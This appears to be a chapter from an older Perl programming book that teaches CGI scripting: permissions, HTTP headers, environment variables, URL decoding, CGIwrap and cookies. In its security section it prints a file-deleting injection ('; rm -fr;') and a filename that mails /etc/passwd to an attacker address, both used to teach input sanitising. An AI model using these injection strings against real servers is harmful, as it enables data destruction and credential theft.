CGI, or Common Gateway Interface, is the standard programming interface between web servers and external programs. It is one of the most exciting and fun areas of programming today. The CGI standard lets web browsers pass information to programs written in any language. If you want to create a lightning-fast search engine, then your CGI program will most likely be written in C or C++. However, most other applications can use Perl.
The CGI standard does not exist in isolation; it depends on the HTML and HTTP standards. HTML is the standard that lets web browsers understand document content. HTTP is the communications protocol that, among other things, lets web servers talk with web browsers.
Note |
If you are unfamiliar with HTML, you might want to skip to the HTML introduction in Chapter 20, "Form Processing," before continuing. Otherwise, take the HTML references in this chapter at face value. |
Almost anyone can throw together some HTML and hang a "home page" out on the web. But most sites out there are, quite frankly, boring. Why? The fact is that most sites are built as a simple series of HTML documents that never change. The site is completely static. No one is likely to visit a static page more than once or twice. Think about the sites you visit most often. They probably have some interesting content, certainly, but more importantly, they have dynamic content.
So what's a webmaster to do? No webmaster has the time to update their web site by hand every day. Fortunately, the people who developed the web protocol thought of this problem and gave us CGI. CGI gives you a way to make web sites dynamic and interactive.
Each word in the acronym, "Common Gateway Interface," helps to understand the interface:
CGI applications can perform nearly any task that your imagination can think up. For example, you can create web pages on-the-fly, access databases, hold telnet sessions, generate graphics, and compile statistics.
The basic concept behind CGI is pretty simple; actually creating CGI applications is not. That requires real programming skills. You need to be able to debug programs and make logical connections between one idea and another. You also need to have the ability to visualize the application that you'd like to create. This chapter and the next, "Form Processing," will get you started with CGI programming. If you plan to create large applications, you might want to look at Que's "Special Edition, Using CGI".
The advantage of an interpreted language in CGI applications is its simplicity in development, debugging and revision. By removing the compilation step, you and I can move more quickly from task to task, without the frustration that can sometimes arise from debugging compiled programs. Of course not any interpreted language will do. Perl has the distinct advantage of having an extremely rich and capable functionality.
There are times when a mature CGI application should be ported to C or another compiled language. These are the web applications where speed is important. If you expect to have a very active site, you probably want to move to a compiled language because compiled programs run faster.
CGI applications should be designed to take advantage of the centralized nature of a web server. They are great for searching databases, processing HTML form data, and other applications that require limited interaction with a user.
Java applications are good when you need a high degree of interaction with users; for example, games or animation.
Java programs need to be kept relatively small because they are transmitted through the Internet to the client. CGI applications on the other hand can be as large as needed because they reside and are executed on the web server.
You can design your web site to use both Java and CGI applications. For example, you might want to use Java on the client side to do field validation when collecting information on a form. Then once the input has been validated, the Java application can send the information to a CGI application on the web server where the database resides.
You might find that CGI.pm is overkill for simple CGI applications. If so, look at cgi-lite.pl. This library doesn't do as much as CGI.pm but you'll probably find that it is easier to use.
You can find both of these scripts at one of the CPAN web sites that are mentioned in Chapter 22, "Internet Resources."
However, in this book I have purposely not used these scripts. I feel it is important for you to understand the mechanisms behind the protocols. This will make debugging your applications easier because you'll have a better idea of what the modules are doing behind the scenes. You will also be able to make better use of pre-existing modules if you can make educated guesses about what a poorly documented function does.
Tip
You can test your scripts locally as long as you can use Perl on your local machine. See the "Debugging CGI Programs" section later in this chapter.
Web servers are generally configured so that all CGI applications are placed into a cgi-bin directory. However, the web server may have aliases so that "virtual directories" exist. Each user might have their own cgi-bin directory. The directory location is totally under the control of your web site administrator.
Tip
Finding out which directory your scripts need to be placed in is the first step in creating CGI programs. Since you need to get this information from your web site administrator, send an email message right now requesting this information. Also ask if there are any CGI restrictions or guidelines that you need to follow.
http://localhost/cgi-bin/test.pl
The web server will execute your CGI script, and any output is displayed by your web browser.
The URL for your CGI program is a virtual path. The actual location of the script on the web server depends on the configuration of the server software and the type of computer being used. For example, if your computer is running the Linux operating system and the NCSA web server in a "standard" configuration, then the above virtual path would translate into /usr/local/etc/httpd/cgi-bin/test.pl. If you were running the WebSite server under Windows 95, the translated path might be /website/cgi-shl/test.pl.
If you have installed and are administering the web server yourself, you probably know where to place your scripts. If you are using a service provider's web server, ask the server's administrator where to put your scripts and how to reference them from your documents.
There are other ways to invoke CGI programs besides using a web browser to visit the URL. You can also start CGI programs from:
<A HREF="cgi-bin/test.pl">Click here to run a CGI program</A>
Interestingly enough you can pass information to your CGI program by adding extra information to the standard URL. If your CGI program is used for searching your site, for example, you can pass some information to specify which directory to search. The following HTML hyperlink will invoke a search script and tell it to search the /root/document directory.
<A HREF="cgi-bin/search.pl/root/document">Search the Document Directory</A>
This extra path information can be accessed through the PATH_INFO environment variable.
You can also use a question mark to pass information to a CGI program. Typically a question mark indicates that you are passing keywords that will be used in a search.
<A HREF="cgi-bin/search.pl?Wine+1993">Search for 1993 Wines</A>
The information that follows the question mark will be available to your CGI program through the QUERY_STRING environment variable.
Using either of these approaches will let you create canned CGI requests. By creating these requests ahead of time, you can reduce the number of typing errors that your users might otherwise make. Later in this chapter, the "CGI and Environment Variables" section discusses all of the environment variables you can use inside CGI programs.
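As a minimal sketch of how a script might pick up both kinds of canned information, the following program reads PATH_INFO and QUERY_STRING from the %ENV hash. The requestInfo() function name and the plain-text report are illustrative assumptions, not part of any listing in this chapter.

```perl
#!/usr/bin/perl -w
use strict;

# Return the extra path information and the raw query string for the
# current request. Either value is an empty string when the web server
# did not supply it.
sub requestInfo {
    my $pathInfo    = defined $ENV{'PATH_INFO'}    ? $ENV{'PATH_INFO'}    : '';
    my $queryString = defined $ENV{'QUERY_STRING'} ? $ENV{'QUERY_STRING'} : '';
    return ($pathInfo, $queryString);
}

my ($pathInfo, $queryString) = requestInfo();

# Keywords in a canned query such as "Wine+1993" are joined with plus signs.
my @keywords = split(/\+/, $queryString);

print("Content-type: text/plain\n\n");
print("Extra path: $pathInfo\n");
print("Keywords:   @keywords\n");
```

For the search.pl/root/document link shown earlier, the extra path would be /root/document; for the search.pl?Wine+1993 link, the keywords would be Wine and 1993.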
Note |
Generally speaking, visitors to your web site should never have to type in the URL for a CGI program. A hypertext link should always be provided to start the program. |
Pseudocode |
Turn on the warning option. Turn on the strict pragma. Send the HTTP header to the web browser. Send a line of text to the web browser. |
Listing 19.1-19LST01.PL - A Very Small CGI Program |
|
The file that contains this CGI program should be placed in your web server's cgi-bin directory. Then, the URL for this program will be something like http://localhost/cgi-bin/test.pl (change localhost to correspond to your web server's hostname). Enter this URL into your web browser and it should display a web page saying "This is a test."
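A program that follows the pseudocode above could look roughly like the sketch below. It is an illustration, not necessarily the text of Listing 19.1; the httpHeader() and pageBody() helper names are assumptions introduced here so that each step of the pseudocode is visible.

```perl
#!/usr/bin/perl -w
use strict;

# Return the HTTP header, including the blank line that must follow it.
sub httpHeader {
    return "Content-type: text/html\n\n";
}

# Return the single line of text that makes up the web page.
sub pageBody {
    return "This is a test.\n";
}

# Send the HTTP header to the web browser, then the line of text.
print(httpHeader());
print(pageBody());
```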
Note |
You may wonder how the web server knows that a CGI program should be executed instead of being displayed. This is an excellent question. It can be best answered by referring to the documentation that came with your particular server. |
When the web server executes your CGI program, it automatically opens the STDIN, STDOUT, and STDERR file handles for you.
The web server will also make some information available to your CGI program through environment variables. You may recall the %ENV hash from Chapter 12, "Using Special Variables." Details about the environment variables that you can use can be found in the "CGI and Environment Variables" section later in this chapter.
UNIX can control file access in a number of ways. There are three levels of permissions for three classes of users. To view the permissions on a file, use the ls command with the -l command-line option. For example:
C:indyunix:~/public_html/pfind>ls -l
total 40
-rw-r--r-- 1 dbewley staff 139 Jun 18 14:14 home.html
-rwxr-xr-x 1 dbewley staff 9145 Aug 14 07:06 pfind
drwxr-xr-- 2 dbewley staff 512 Aug 15 07:11 tmp
Each line of this listing indicates a separate directory entry. The first character of the first column is normally either a dash or the letter d. If a directory entry has a d, it means that the entry is a subdirectory of the current directory.
The other nine characters are the file permissions. Permissions should be thought of in groups of three, for the three classes of user. The three classes of user are the user (the owner of the file), the group, and others (everyone else).
Each of the classes can have one or more of the following three levels of permission: read (r), write (w), and execute (x).
If a permission is not granted to a class of user, its position is filled with a dash. For example:
ls -l slideshow.pl
-rwx------ 1 dbewley staff 11816 May 9 09:19 slideshow.pl
The owner, dbewley, has full rights (read, write, and execute) for this file. The group, staff, and everyone else have no rights.
Tip |
Perl scripts are not compiled; the perl interpreter must read them each time they are run. Therefore Perl scripts, unlike compiled programs, must have both read and execute permissions. |
Here is another example:
ls -l pfind.pl
-rwxr-x--- 1 dbewley staff 2863 Oct 10 1995 pfind.pl
This time, the owner has full access while the group staff can read and execute the file. All others have no rights to this file.
Most HTML files will have permissions that look like this:
ls -l schedule.html
-rw-r--r-- 1 dbewley staff 2439 Feb 8 1996 schedule.html
Everyone can read it, but only the owner can modify or delete it. There is no need to have execute permission since HTML is not an executable language.
You can change the permissions on a file by using the chmod command. The chmod command recognizes the three classes of user as u, g, and o and the three levels of permissions as r, w, and x. It grants and revokes permissions with a + or - in conjunction with each permission that you want to change. It also will accept an a for all three classes of users at once.
The syntax of the chmod command is:
chmod <options> <file>
Here are some examples of the chmod command in action:
ls -l pfind.pl
-rw------- 1 dbewley staff 2863 Oct 10 1995 pfind.pl
chmod u+x pfind.pl
ls -l pfind.pl
-rwx------ 1 dbewley staff 2863 Oct 10 1995 pfind.pl
The first ls command shows you the original file permissions. Then, the chmod command added execute permission for the owner (or user) of pfind.pl. The second ls command displays the newly changed permissions.
To add read and execute permissions for both the group and others classes, use go+rx as in the following example. Remember, users must have at least read and execute permissions to run Perl scripts.
ls -l pfind.pl
-rwx------ 1 dbewley staff 2863 Oct 10 1995 pfind.pl
chmod go+rx pfind.pl
ls -l pfind.pl
-rwxr-xr-x 1 dbewley staff 2863 Oct 10 1995 pfind.pl
Now, any user can read and execute pfind.pl. Let's say a serious bug was found in pfind.pl and we don't want it to be executed by anyone. To revoke execute permission for all classes of user, use the a-x option with the chmod command.
ls -l pfind.pl
-rwxr-xr-x 1 dbewley staff 2863 Oct 10 1995 pfind.pl
chmod a-x pfind.pl
ls -l pfind.pl
-rw-r--r-- 1 dbewley staff 2863 Oct 10 1995 pfind.pl
Now, all users can read pfind.pl, but no one can execute it.
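The same changes can be made from inside a Perl program with the built-in stat() and chmod() functions, which work with octal permission bits rather than the u, g, o letters. The sketch below is one way to express go+rx and a-x; the function names are illustrative assumptions.

```perl
#!/usr/bin/perl -w
use strict;

# Return the permission bits of a file (for example 0755), or undef if
# the file cannot be examined.
sub permissionsOf {
    my ($file) = @_;
    my @info = stat($file);
    return undef unless @info;
    return $info[2] & 07777;
}

# Equivalent of "chmod go+rx": add read and execute for group and others.
sub grantGroupOtherReadExecute {
    my ($file) = @_;
    my $mode = permissionsOf($file);
    return 0 unless defined $mode;
    return chmod($mode | 0055, $file);
}

# Equivalent of "chmod a-x": clear the execute bit for all three classes.
sub revokeExecute {
    my ($file) = @_;
    my $mode = permissionsOf($file);
    return 0 unless defined $mode;
    return chmod($mode & ~0111, $file);
}
```

Calling grantGroupOtherReadExecute('pfind.pl') on a file with permissions -rwx------ would leave it as -rwxr-xr-x, and a following revokeExecute('pfind.pl') would leave it as -rw-r--r--, matching the ls listings above.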
Response Type | HTTP Header |
---|---|
Text | Content-type: text/plain |
HTML page | Content-type: text/html |
GIF graphic | Content-type: image/gif |
Redirection to another web page | Location: http://www.foobar.com |
Cookie | Set-cookie: ... |
Error Message | Status: 402 |
All HTTP headers must be followed by a blank line. Use the following line of code as a template:
print("Content-type: text/html\n\n");
Notice that the HTTP header is followed by two newline characters. This is very important. It ensures that a blank line will always follow the HTTP header.
If you have installed any helper applications for Netscape or are familiar with MIME types, you already recognize the text/plain and text/html parts of the Content-type header. They tell the remote web browser what type of information you are sending. The two most common MIME types to use are text/plain and text/html.
The Location header is used to redirect the client web browser to another web page. For example, let's say that your CGI script is designed to randomly choose from among 10 different URLs in order to determine the next web page to display. Once the new web page is chosen, your program outputs it like this:
print("Location: $nextPage\n\n");
Once the Location header has been printed, nothing else should be printed. That is all the information that the client web browser needs.
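The random-redirect idea can be sketched as a complete script. The ten URLs below are hypothetical placeholders, and redirectHeader() is an illustrative helper name; only the Location header format comes from the text above.

```perl
#!/usr/bin/perl -w
use strict;

# Build the complete redirect header, including the blank line that ends it.
sub redirectHeader {
    my ($url) = @_;
    return "Location: $url\n\n";
}

# Hypothetical list of ten candidate pages.
my @pages = map { "http://www.foo.com/page$_.html" } (1 .. 10);

# rand(@pages) yields a number from 0 up to, but not including, 10;
# int() turns it into a valid array index.
my $nextPage = $pages[int(rand(@pages))];

# This is the only output the script produces.
print(redirectHeader($nextPage));
```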
Cookies and the Set-cookie: header are discussed in the "Cookies" section later in this chapter.
The last type of HTTP header is the Status header. This header should be sent when an error arises in your script that your program is not equipped to handle. I feel that this HTTP header should not be used unless you are under severe time pressure to complete a project. You should try to create your own error handling routines that display a full web page that explains the error that happened and what the user can do to fix or circumvent it. You might include the time, date, type of error, contact names and phone numbers and any other information that might be useful to the user. Relying on the standard error messages of the web server and browser will make your web site less user friendly.
Table 19.2 contains a short description of each environment variable. A complete description of the environmental variables used in CGI programs can be found at
http://www.ast.cam.ac.uk/~drtr/cgi-spec.html
CGI Environment Variables | Description |
---|---|
AUTH_TYPE | Optionally provides the authentication protocol used to access your script if the local web server supports authentication and if authentication was used to access your script. |
CONTENT_LENGTH | Optionally provides the length, in bytes, of the content provided to the script through the STDIN file handle. Used particularly in the POST method of form processing. See Chapter 20, "Form Processing," for more information. |
CONTENT_TYPE | Optionally provides the type of content available from the STDIN file handle. This is used for the POST method of form processing. Most of the time this variable will be blank and you can assume a value of application/octet-stream. |
GATEWAY_INTERFACE | Provides the version of CGI supported by the local web server. Most of the time this will be equal to CGI/1.1. |
HTTP_ACCEPT | Provides a comma-separated list of MIME types the browser software will accept. You might check this environment variable to see if the client will accept a certain kind of graphic file. |
HTTP_USER_AGENT | Provides the type and version of the user's web browser. For example, the Netscape web browser is called Mozilla. |
HTTP_FROM | Provides the user's email address. Not all web browsers will supply this information to your server. Therefore, only use this field to provide a default value for an HTML form. |
QUERY_STRING | Optionally contains form information when the GET method of form processing is used. QUERY_STRING is also used for passing information like search keywords to CGI scripts. |
PATH_INFO | Optionally contains any extra path information from the HTTP request that invoked the script. |
PATH_TRANSLATED | Maps the script's virtual path (i.e. from the root of the server directory) to the physical path used to call the script. |
REMOTE_ADDR | Contains the dotted decimal address of the user. |
REMOTE_HOST | Optionally provides the domain name for the site that the user has connected from. |
REMOTE_IDENT | Optionally provides client identification when your local server has contacted an IDENTD server on a client machine. You will very rarely see this because the IDENTD query is slow. |
REMOTE_USER | Optionally provides the name used by the user to access your secured script. |
REQUEST_METHOD | Usually contains either "GET" or "POST" - the method by which form information will be made available to your script. See Chapter 20, "Form Processing," for more information. |
SCRIPT_NAME | Contains the virtual path to the script. |
SERVER_NAME | Contains the configured hostname for the server. |
SERVER_PORT | Contains the port number that the local web server software is listening on. The standard port number is 80. |
SERVER_PROTOCOL | Contains the version of the web protocol this server uses. For example, HTTP/1.0. |
SERVER_SOFTWARE | Contains the name and version of the web server software. For example, webSite/1.1e. |
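A quick way to see which of these variables your own server actually sets is to print the whole %ENV hash. The following is a minimal sketch; environmentReport() is an illustrative name, and the plain-text output format is an assumption.

```perl
#!/usr/bin/perl -w
use strict;

# Turn a hash of environment variables into one "NAME = value" line per
# entry, sorted by name so the report is easy to scan.
sub environmentReport {
    my (%env) = @_;
    my $report = '';
    foreach my $name (sort(keys(%env))) {
        $report .= "$name = $env{$name}\n";
    }
    return $report;
}

print("Content-type: text/plain\n\n");
print(environmentReport(%ENV));
```

Variables described as optional in the table simply will not appear in the report when the server has not set them.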
To clear up the ambiguity, the URL encoding scheme was created. Any spaces are converted into plus (+) signs to avoid semantic ambiguities. In addition, special characters or 8-bit values are converted into their hexadecimal equivalents and prefaced with a percent sign (%). For example, the string Davy Jones <dj@mtolive.com> is encoded as Davy+Jones+%3Cdj@mtolive.com%3E. If you look closely, you see that the < character has been converted to %3C and the > character has been converted to %3E.
Your CGI script will need to be able to convert URL encoded information back into its normal form. Fortunately, Listing 19.2 contains a function that converts URL encoded information.
Pseudocode |
Define the decodeURL() function. Get the encoded string from the parameter array. Translate all plus signs into spaces. Convert character coded as hexadecimal digits into regular characters. Return the decoded string. |
Listing 19.2-19LST02.PL - How to Decode the URL Encoding |
|
This function will be used in Chapter 20, "Form Processing," to decode form information. It is presented here because canned queries also use URL encoding.
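The pseudocode for decodeURL() can be sketched as follows. This is an illustration of the steps it describes, not necessarily the text of Listing 19.2.

```perl
#!/usr/bin/perl -w
use strict;

sub decodeURL {
    # Get the encoded string from the parameter array.
    my ($encoded) = @_;

    # Translate all plus signs into spaces. This happens first so that a
    # literal plus sign sent as %2B is not turned into a space afterwards.
    $encoded =~ tr/+/ /;

    # Convert each %XX sequence into the character with that hexadecimal code.
    $encoded =~ s/%([0-9a-fA-F]{2})/pack("C", hex($1))/eg;

    return $encoded;
}

print(decodeURL('Davy+Jones+%3Cdj@mtolive.com%3E'), "\n");
```

Run from the command line, the example prints Davy Jones <dj@mtolive.com>, the reverse of the encoding shown earlier.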
Suppose that you had a CGI script that formatted a directory listing and generated a web page that let visitors view the listing. In addition, let's say that the name of the directory to display was passed to your program using the PATH_INFO environment variable. The following URL could be used to call your program:
http://www.foo.com/cgi-bin/dirlist.pl/docs
Inside your program, the PATH_INFO environment variable is set to /docs. In order to get the directory listing, all that is needed is a call to the ls command in UNIX or the dir command in DOS. Everything looks good, right? But what if the program was invoked with this URL?
http://www.foo.com/cgi-bin/dirlist.pl/; rm -fr;
Now, all of a sudden, you are faced with the possibility of files being deleted because the semi-colon (;) lets multiple commands be executed on one command line.
This same type of security hole is possible any time you try to run an external command. You might be tempted to use the mail, sendmail, or grep commands to save time while writing your CGI program, but since all of these programs are easily duplicated using Perl, try to resist the temptation.
Another security hole is related to using external data to open or create files. Some enterprising hacker could use "| mail hacker@hacker.com < /etc/passwd" as the filename to mail your password file or any other file to himself.
All of these security holes can be avoided by removing the dangerous characters (like the | or pipe character).
Pseudocode |
Define the improveSecurity() function. Copy the passed string into $_, the default search space. Protect against command-line options by removing - and + characters. Additional protection against command-line options. Convert all dangerous characters into harmless underscores. Return the $_ variable. |
Listing 19.3-19LST03.PL - How to Remove Dangerous Characters |
|
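The improveSecurity() pseudocode can be sketched as shown below. The exact set of characters treated as dangerous is an assumption made for this illustration, and the function works on a lexical copy of the string rather than on $_; it is not necessarily the text of Listing 19.3.

```perl
#!/usr/bin/perl -w
use strict;

sub improveSecurity {
    # Copy the passed string into a local variable.
    my ($text) = @_;

    # Protect against command-line options by removing leading
    # - and + characters.
    $text =~ s/^[-+]+//;

    # Additional protection: remove - and + characters that follow
    # whitespace, since they could start an option later in the string.
    $text =~ s/(\s)[-+]+/$1/g;

    # Convert characters that are special to the shell into harmless
    # underscores (assumed list: $ ' ` " < > / ; ! | &).
    $text =~ tr/$'`"<>\/;!|&/_/;

    return $text;
}

print(improveSecurity('; rm -fr;'), "\n");
```

With this sketch, the dangerous path information from the earlier URL becomes _ rm fr_, which the shell treats as ordinary text. Because the slash is also replaced, this particular character list suits single directory or file names rather than full paths.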
CGIwrap (http://wwwcgi.umr.edu/~cgiwrap/) is a UNIX-based utility written by Nathan Neulinger which lets general users run CGI scripts without needing access to the server's cgi-bin directory. Normally all scripts must be located in the server's main cgi-bin directory and all run with the same UID (user id) as the web server. CGIwrap performs various security checks on the scripts before changing id to match the owner of the script. All scripts are executed with the same user id as the user who owns them. CGIwrap works with NCSA, Apache, CERN, Netsite, and probably any other UNIX web server.
Any files created by a CGI program are normally owned by the web server. This can cause a problem if you need to edit or remove files created by CGI programs. You might have to ask the system administrator for help because you lack the proper authorization. All CGI programs have the same system permissions as the web server. If you run your web server under the root user id - being either very brave or very foolish - a CGI program could be tricked into erasing the entire hard drive. CGIwrap provides a way around these problems.
With CGIwrap, scripts are located in users' public_html/cgi-bin directory and run under their user id. This means that any files the CGI program creates are owned by the same user. Damage caused by any security bugs you may have introduced - via the CGI program - will be limited to your own set of directories.
In addition to this security advantage, CGIwrap is also an excellent debugging tool. When CGIwrap is installed it is copied to cgiwrapd which can be used to view output of failing CGIs.
You can install CGIwrap by following these steps.
Tip |
You can find additional information at the http://www.umr.edu/~cgiwrap/install.html web site. |
CGIs that run using CGIwrap are stored in a cgi-bin directory under an individual user's public web directory and called like this:
http://servername/cgi-bin/cgiwrap/~userid/scriptname
To debug a script run via cgiwrap, add the letter "d" to cgiwrap:
http://servername/cgi-bin/cgiwrapd/~userid/scriptname
When you use CGIwrap to debug your CGI programs, quite a lot of information will be displayed in the web browser's window. For example, if you called a CGI program with the following URL:
http://www.engr.iupui.edu/cgi-bin/cgiwrapd/~dbewley/cookie-test.pl
The output might look like this:
Redirecting STDERR to STDOUT
Setting Limits (CPU)
Environment Variables:
QUERY_STRING: ''
PATH_INFO: '/~dbewley/cookie-test.pl'
REMOTE_HOST: 'x2s5p10.dialin.iupui.edu'
REMOTE_ADDR: '134.68.249.69'
SCRIPT_NAME: '/cgi-bin/cgiwrapd'
Trying to extract user/script from PATH_INFO
Extracted Data:
User: 'dbewley'
Script: 'cookie-test.pl'
Stripping user and script data from PATH_INFO env. var.
Adding user and script to SCRIPT_NAME env. var.
Modified Environment Variables:
PATH_INFO: ''
SCRIPT_NAME: '/cgi-bin/cgiwrapd/dbewley/cookie-test.pl'
Sanitize user name: 'dbewley'-'dbewley'
Sanitize script name: 'cookie-test.pl'-'cookie-test.pl'
Log Request
Opening log file.
Writing log entry.
Closing log file.
Done logging request.
User Data Retrieved:
UserName: 'dbewley'
UID: '8670'
GID: '200'
Directory: '/home/stu/d/dbewley'
UIDs/GIDs Changed To:
RUID: '8670'
EUID: '8670'
RGID: '200'
EGID: '200'
Current Directory: '/sparcus/users/dbewley/www/cgi-bin'
Results of stat:
File Owner: '8670'
File Group: '200'
Exec String: './cookie-test.pl'
Output of script follows:
=====================================================
Set-Cookie: user=dbewley; expires=Wednesday, 09-Nov-99 00:00:00 GMT; path=/cgi-bin/; domain=.engr.iupui.edu;
Set-Cookie: flag=black; expires=Wednesday, 09-Nov-99 00:00:00 GMT; path=/cgi-bin/; domain=.iupui.edu;
Set-Cookie: car=honda:accord:88:LXI:green; expires=Wednesday, 09-Nov-99 00:00:00 GMT; path=/cgi-bin/; domain=.engr.iupui.edu;
Content-type: text/html
Cookies:<BR>
flag = black<br>
car = honda:accord:88:LXI:green<br>
user = dbewley<br>
This output can be invaluable if your script is dying because of a syntax error before it can print an HTTP header to the browser.
Note |
If you'd like a more in-depth description of CGI
Security visit these web sites:
|
One answer to this dilemma is to use cookies in your CGI programs. Cookies can provide a way to maintain information from one HTTP request to the next - remember the concept of persistent information?
A cookie is a small chunk of data, stored on the visitor's local hard drive by the web server. It can be used to track a visitor's path through a web site and develop a visitor's profile for marketing or informational purposes. Cookies can also be used to hold information like account numbers and purchase decisions so that shopping applications can be created.
During a browsing session Netscape stores cookies in memory, but when the browser is exited cookies are written into a file called cookies.txt. On the Macintosh the cookie jar is in a file called MagicCookie in the preferences folder. The cookie file contains plain text as shown in Listing 19.3.
When all of these elements are put together they look like this:
Set-Cookie: user_addr=ppp1.dialin.iupui.edu; expires=Wednesday, 09-Nov-99 00:00:00 GMT; path=/cgi-bin/; domain=.engr.iupui.edu; secure
Listing 19.4 contains a program that both sets and reads cookies. First, it will create four cookies and then it will read those cookies from the HTTP_COOKIE environment variable. Inside the HTTP_COOKIE environment variable, the cookies are delimited by a semicolon and a space. The cookie fields are separated by commas, and the name-value pairs are separated by equal signs. In order to use cookies, you need to parse the HTTP_COOKIE variable at three different levels.
Pseudocode |
Turn on the warning option. Turn on the strict pragma. Declare a variable to hold the expiration date and time of the cookies. Declare a variable to hold the domain name. Declare a variable to hold the path name. Set four cookies with different values. Read those four cookies from the environment and place them into %cookies. Start the HTML web page. Display a text heading on the web page. Start an HTML table. Display each cookie in a table row. End the table. End the web page. Define the setCookie() function. Create local variables from the parameter array. Send the Set-Cookie: HTTP header to the web browser. Send the secure option only if requested. End the header with a newline. Define the getCookies() function. Create a local hash to hold the cookies. Iterate over an array created by splitting the HTTP_COOKIE environment variable based on the "; " character sequence. Split off the name of the cookie. Create a hash entry with the cookie's name as the key and the rest of the cookie as the entry's value. Return the hash. |
Listing 19.4-19LST04.PL - How to Set and Retrieve Cookies |
|
This program shows that the web server stores a copy of any cookies that you set into the HTTP_COOKIE environment variable. It only performs one level of parsing. In order to create a really useful getCookies() function, you need to split the cookie on the comma character and then again on the equals character.
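The two functions named in the pseudocode can be sketched as follows. This is an illustration rather than the text of Listing 19.4: cookieHeader() returns the header as a string instead of printing it (a choice made here so the result is easy to inspect), and getCookies() takes the cookie string as a parameter and performs only the first level of parsing described above.

```perl
#!/usr/bin/perl -w
use strict;

# Build one Set-Cookie header line. The secure option is added only
# when the last argument is true.
sub cookieHeader {
    my ($name, $value, $expires, $path, $domain, $secure) = @_;
    my $header = "Set-Cookie: $name=$value; expires=$expires; "
               . "path=$path; domain=$domain";
    $header .= "; secure" if $secure;
    return "$header\n";
}

# Split a cookie string such as the value of HTTP_COOKIE into a hash
# keyed by cookie name. Everything after the first equals sign is kept
# as the value.
sub getCookies {
    my ($cookieString) = @_;
    my %cookies;
    foreach my $cookie (split(/; /, $cookieString)) {
        my ($name, $value) = split(/=/, $cookie, 2);
        $cookies{$name} = $value;
    }
    return %cookies;
}

my %cookies = getCookies(defined $ENV{'HTTP_COOKIE'} ? $ENV{'HTTP_COOKIE'} : '');

print(cookieHeader('flag', 'black', 'Wednesday, 09-Nov-99 00:00:00 GMT',
                   '/cgi-bin/', '.iupui.edu', 0));
print("Content-type: text/plain\n\n");
foreach my $name (sort(keys(%cookies))) {
    print("$name = $cookies{$name}\n");
}
```

Note that every Set-Cookie line is printed before the blank line that ends the HTTP header.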
Listing 19.5 contains a script that shows you a nice way of automatically determining if a visitor's web browser supports cookies. The CGI program will set a cookie and then redirect the visitor's web browser back to itself with some additional path information. When the script (during its second invocation) sees the extra path information, it checks for the previously created cookie. If it exists, the visitor's browser has passed the test. Otherwise, the visitor's browser does not support cookies.
Pseudocode |
Turn on the warning option. Turn on the strict pragma. If there is no query information, then set a cookie and reload the script. Otherwise, see if the cookie set before the reload exists. If the cookie exists, the browser supports cookies. If the cookie does not exist, the browser does not support cookies. |
Listing 19.5-19LST05.PL - How to Tell If the Visitor's Browser Supports Cookies |
|
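The cookie test described above can be sketched as a single function that decides what to send back. Everything named here is an assumption made for illustration: the cookieTest cookie, the /check path suffix, and the way the script's own URL is assembled from SERVER_NAME and SCRIPT_NAME (which ignores non-standard ports). It is not the text of Listing 19.5.

```perl
#!/usr/bin/perl -w
use strict;

# Decide on the response for one request.
#   $scriptUrl    - absolute URL of this script
#   $pathInfo     - extra path information, empty on the first visit
#   $cookieString - cookies sent by the browser, if any
sub cookieTestResponse {
    my ($scriptUrl, $pathInfo, $cookieString) = @_;

    # First invocation: set a cookie and send the browser back to this
    # script with some extra path information.
    if ($pathInfo eq '') {
        return "Set-Cookie: cookieTest=yes\n"
             . "Location: $scriptUrl/check\n\n";
    }

    # Second invocation: see whether the cookie came back.
    my $found   = ($cookieString =~ /(?:^|; )cookieTest=yes(?:;|$)/);
    my $verdict = $found ? "supports" : "does not support";
    return "Content-type: text/plain\n\n"
         . "Your browser $verdict cookies.\n";
}

my $server   = defined $ENV{'SERVER_NAME'} ? $ENV{'SERVER_NAME'} : 'localhost';
my $script   = defined $ENV{'SCRIPT_NAME'} ? $ENV{'SCRIPT_NAME'} : '/cgi-bin/test.pl';
my $pathInfo = defined $ENV{'PATH_INFO'}   ? $ENV{'PATH_INFO'}   : '';
my $cookies  = defined $ENV{'HTTP_COOKIE'} ? $ENV{'HTTP_COOKIE'} : '';

print(cookieTestResponse("http://$server$script", $pathInfo, $cookies));
```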
Note |
You can find more information about cookies at these
web sites:
http://home.netscape.com/newsref/std/cookie_spec.html http://www.netscapeworld.com/netscapeworld/nw-07-1996/nw-07-cookies.html http://www.emf.net/~mal/cookiesinfo.html http://ds.internic.net/internet-drafts/draft-ietf-http-state-mgmt-03.txt http://www.illuminatus.com/cookie/ http://www.jasmin.com/cook0696.html http://www.bravado.net/rodgers/InterNetNews.html |
Pseudocode |
Send the HTTP header indicating a plain text document. Send a line of text. Call the logError() function to send a message to the server's log file. Call the logError() function to send a message to the server's log file. Send a line of text. Define the logError() function. Declare a local variable to hold the message. Print the message to STDERR with a timestamp. Define the timeStamp() function. Declare some local variables to hold the current date and time. Call the zeroFill() function to format the numbers. Return a formatted string holding the current date and time. Define the zeroFill() function - turns "1" into "01". Declare a local variable to hold the number to be filled. Declare a local variable to hold the string length that is needed. Find difference between current string length and needed length. If the string is long enough (like "12") then return it. If the string is too short, prefix it with some zeroes. |
Listing 19.6-19LST06.PL - Sending Messages to the Server's Error Log |
|
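A sketch that follows the pseudocode above is shown here. The message texts and the date format are assumptions chosen for illustration; this is not necessarily the text of Listing 19.6.

```perl
#!/usr/bin/perl -w
use strict;

print("Content-type: text/plain\n\n");
print("This is line one.\n");
logError("First message for the error log");
logError("Second message for the error log");
print("This is line two.\n");

# Print a message to STDERR, prefixed with the current date and time.
sub logError {
    my ($message) = @_;
    print STDERR (timeStamp() . " $message\n");
}

# Return the current date and time as "YYYY/MM/DD, HH:MM:SS".
sub timeStamp {
    my ($sec, $min, $hour, $mday, $mon, $year) = localtime(time());
    $mon  = zeroFill($mon + 1, 2);    # localtime() counts months from 0
    $mday = zeroFill($mday, 2);
    $hour = zeroFill($hour, 2);
    $min  = zeroFill($min, 2);
    $sec  = zeroFill($sec, 2);
    $year += 1900;                    # localtime() counts years from 1900
    return "$year/$mon/$mday, " . join(':', $hour, $min, $sec);
}

# Pad a number on the left with zeroes: zeroFill(1, 2) gives "01".
sub zeroFill {
    my ($number, $length) = @_;
    my $missing = $length - length($number);
    return $number if $missing <= 0;          # already long enough
    return ('0' x $missing) . $number;        # too short, so add zeroes
}
```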
Caution |
According to the CGI specifications the STDERR file handle should be connected to the server's error log. However, I found that this was not true when using Windows 95 and O'Reilly's Website server software. There may be other combinations of operating systems and server software that also fail to connect STDERR to the error log. |
open(STDERR, ">&STDOUT");
